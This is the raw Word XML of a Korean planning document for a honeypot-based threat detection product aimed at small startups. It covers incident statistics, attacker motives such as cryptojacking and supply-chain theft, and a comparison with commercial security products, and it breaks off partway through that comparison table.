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20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>[최종 종합 기획서] 허니팟 기반 보안 위협 탐지 시스템 (HoneyGuard)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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실제 인터넷 공격 수집 · AI 런타임 시맨틱 분석 · 실시간 관제 시각화 CTI 플랫폼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>1. 프로젝트 개요 및 배경</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.1 배경 및 객관적 통계 지표</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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사이버 침해사고의 폭발적 급증</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">: 과학기술정보통신부 및 한국인터넷진흥원(KISA)의 발표에 따르면, 2025년 사이버 침해사고 신고 건수는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>2,383건으로 전년(1,887건) 대비 26.3% 급증</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>함(일평균 약 6.5건 이상).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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자동화 봇넷의 전역 무차별 공격 일상화</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>: 특정 대상을 목표로 삼는 표적 공격(APT)뿐만 아니라, 전 세계 IPv4 대역(`0.0.0.0` ~ `255.255.255.255`)을 1초에 수백만 개씩 자동 스캔하여 취약점을 찔러보는 무차별 스캐닝 봇넷이 일상화됨.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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기존 보안 연구 및 교육의 한계</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>: KDD99, CICIDS 등 전통적 연구 데이터셋은 박제된 가상 트래픽에 기반하여, 오늘날 야생(Wild) 인터넷 환경에서 실시간으로 유입되는 최신 변종 공격 전술(TTP)을 전혀 반영하지 못함.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>2. 타깃 고객 정의 및 해커의 타깃팅 동기 분석</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2.1 주 고객층 정의 (Primary Customer Profile)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="120" w:before="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:i/>
          <w:color w:val="323C5A"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>"ISMS 의무 인증 대상이 아니어서 수천만 원대 보안관제(SOC/SIEM) 솔루션을 구축하지 못하지만, AWS 클라우드에 Linux 인스턴스를 운영하고 있어 인프라 운영과 보안을 겸임하는 10~50인 IT 스타트업의 1인 DevOps / 백엔드 엔지니어"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:i/>
          <w:color w:val="323C5A"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2.2 해커들이 소규모 기업/스타트업을 적극적으로 공격하는 4대 이유</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">*"해커들은 돈이 많은 대기업만 공격할 것이다"*라는 생각은 현실의 사이버 공격 환경과 정반대입니다. 해커에게 소규모 IT 스타트업은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>오히려 대기업보다 훨씬 매력적인 최고의 먹잇감</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>입니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>#### ① 공격 방식의 현실: 대상을 가리지 않는 "기회주의적 무차별 스캔 (Mass Opportunistic Scan)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>해커는 "여기가 대기업인가, 스타트업인가"를 보고 공격을 결정하지 않습니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>ZMap, Masscan 같은 자동화 도구로 인터넷 전체 IP의 22번(SSH), 23번(Telnet) 포트를 무차별 스캔합니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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스타트업이 클라우드에 서버를 띄워두는 순간, 봇넷의 그물망에 자동으로 걸려들어 매일 수천~수만 번의 침투 시도를 받게 됩니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>#### ② 공짜 코인 채굴장 (자원 탈취: Cryptojacking)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>대기업 서버는 24시간 보안관제팀이 상주하여 CPU가 90% 이상 치솟으면 5분 만에 발각되고 격리됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">반면 1인 관리자가 있는 스타트업은 침투해서 코인 채굴기(`xmrig`, `coinminer`)를 돌려도 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>몇 달 동안 털린 줄도 모릅니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>스타트업이 피땀 흘려 내는 AWS 서버 비용으로 해커는 공짜 비트코인/모네로를 채굴하여 막대한 수익을 창출합니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>#### ③ 대기업·국가기관 공격을 위한 "대포 서버 (경유지/좀비 봇넷 발판)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>해커가 대기업이나 금융사를 직접 공격할 경우 즉시 역추적당해 사법당국에 체포됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">따라서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>역추적을 피하기 위한 '발판(Proxy/Pivoting)'으로 보안이 허술한 스타트업 서버 수천 개를 먼저 해킹하여 봇넷으로 편입</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>시킵니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>사고 발생 시 IP 추적은 공격자가 아닌 무고한 스타트업 서버를 가리키게 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>#### ④ 대기업 내부망을 뚫는 징검다리: "공급망 공격 (Supply Chain Attack)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>대기업 본진의 방화벽은 견고하지만, 대기업과 협업하거나 외주를 맡은 스타트업의 보안은 취약합니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">해커는 대기업을 직접 치는 대신, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>스타트업 서버에 보관된 협업 API 키, AWS 인증 토큰, GitHub 소스코드를 탈취하여 대기업 시스템으로 침투</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>합니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>#### ⑤ 극단적인 공격 가성비 (Low Hanging Fruit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">대기업은 수십억 원의 보안 장비로 인해 공격 성공률이 0.01% 미만이지만, 스타트업은 기본 계정(`root/password`, `ubuntu/1234`)이 방치되어 있어 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>자동화 스크립트로 5초 만에 침투</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>할 수 있습니다. 해커의 투자 대비 수익률(ROI)이 극대화됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:line="300" w:lineRule="auto" w:after="8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통계적 팩트</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">: KISA 침해사고 분석 통계에 따르면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>국내 침해사고 피해 기업의 80% 이상이 중소기업 및 스타트업</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>이며, Verizon DBIR 보고서 역시 침해사고의 43%가 소규모 비즈니스를 겨냥한다고 명시하고 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2.3 고객들이 우리 제품을 "반드시" 사용해야 하는 현실적 당위성 (Must-Have Rationale)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t xml:space="preserve">관리자 입장에서 이 시스템은 새로운 일거리가 아니라, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
        </w:rPr>
        <w:t>"수천만 원의 금전적 재앙을 막고 매일 2시간의 야근을 30초로 줄여주는 필수 자동화 방패"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
        <w:t>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E2E8F0"/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b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>구분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E2E8F0"/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b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>도입하지 않았을 때의 현실 (As-Is)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E2E8F0"/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b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>우리 시스템 도입 후 (To-Be)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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>비용 리스크</w:t>
            </w:r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  <w:t xml:space="preserve">해커의 무단 코인 채굴 및 고사양 인스턴스 남용으로 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>월말 AWS 청구서 수백~수천만 원 폭탄</w:t>
            </w:r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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>월 1~2만 원의 초경량 비용</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>으로 사전 위협을 감지해 클라우드 청구서 폭탄 및 랜섬웨어 파산 원천 방지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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>관리자 업무량</w:t>
            </w:r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  <w:t xml:space="preserve">서버 이상 시 매일 수만 줄의 `/var/log/auth.log`를 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>눈으로 까보며 2시간씩 야근</w:t>
            </w:r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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AI가 밤새 로그를 100% 자동 분석</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, 아침에 1장짜리 대시보드 확인 후 30초 만에 원클릭 방어 조치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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>사내 보안 감사</w:t>
            </w:r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  <w:t>사내 직원들의 `admin123` 등 취약 패스워드 방치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  <w:t xml:space="preserve">대시보드의 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>[공격자 최다 시도 비밀번호 Top 10]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>을 사내 계정 생성 금지 블랙리스트로 즉시 연동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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>투자 및 B2B 계약</w:t>
            </w:r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  <w:t>대기업 실사 및 투자 유치(IR) 시 "보안관제 체계 부재"로 계약 결렬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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"클라우드 허니팟 기반 실시간 CTI 관제 체계 구축"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>을 증빙하여 수억 원대 계약 및 투자 실사 통과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>3. 현존 보안 솔루션 종합 분석 및 우리 시스템과의 차별점</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.1 현존 보안 솔루션 계보 및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E2E8F0"/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b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>솔루션 분류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E2E8F0"/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b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>대표 제품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E2E8F0"/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b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>핵심 동작 원리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E2E8F0"/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b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>치명적인 한계점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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AV (전통 백신)</w:t>
            </w:r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  <w:t>알약, V3, Windows Defender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  <w:t>파일 해시 및 알려진 악성코드 바이너리 시그니처 검사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  <w:t>파일 없이 메모리에서만 도는 공격(Fileless)이나 난독화 쉘 스크립트 실행은 탐지 불가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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>EPP (통합 엔드포인트 보호)</w:t>
            </w:r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  <w:t>Symantec, McAfee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  <w:t>AV + 호스트 방화벽 + 취약점 패치 등을 통합한 예방 솔루션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  <w:t>탈취된 유효 자격증명(`root/password`)을 통한 정상 위장 침투는 식별 및 방어 불가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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>EDR (엔드포인트 탐지 대응)</w:t>
            </w:r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  <w:t>CrowdStrike Falcon, SentinelOne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  <w:t>실제 운영 서버 커널 내부에 에이전트를 설치해 프로세스 행위 실시간 감시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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>대량 구매(최소 50~100대) 계약 강제, 수천만 원 비용, 에이전트로 인한 서버 가용성 저하/충돌 리스크</w:t>
            </w:r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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SIEM / SOAR</w:t>
            </w:r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  <w:t>Splunk, Datadog Security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  <w:t>사내 모든 장비의 로그를 중앙 집중 수집하여 상관분석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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GB당 살인적인 과금 체계</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, 수개월간 룰셋을 관리할 전담 보안 엔지니어 필수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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>XDR (확장 탐지 대응)</w:t>
            </w:r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  <w:t>Microsoft Defender XDR, Palo Alto Cortex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  <w:t>엔드포인트 + 네트워크 + 클라우드 로그를 AI로 통합 관제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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>수억 원대 엔터프라이즈 전용 장비</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, 소규모 스타트업 도입 불가능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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>시그니처 IDS/IPS</w:t>
            </w:r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  <w:t>Snort, Suricata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  <w:t>네트워크 패킷 내 정적 텍스트 패턴 매칭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  <w:t xml:space="preserve">명령어가 Base64 인코딩 등으로 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>난독화되면 탐지율 0%로 추락</w:t>
            </w:r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</w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
                <w:b/>
                <w:sz w:val="18"/>
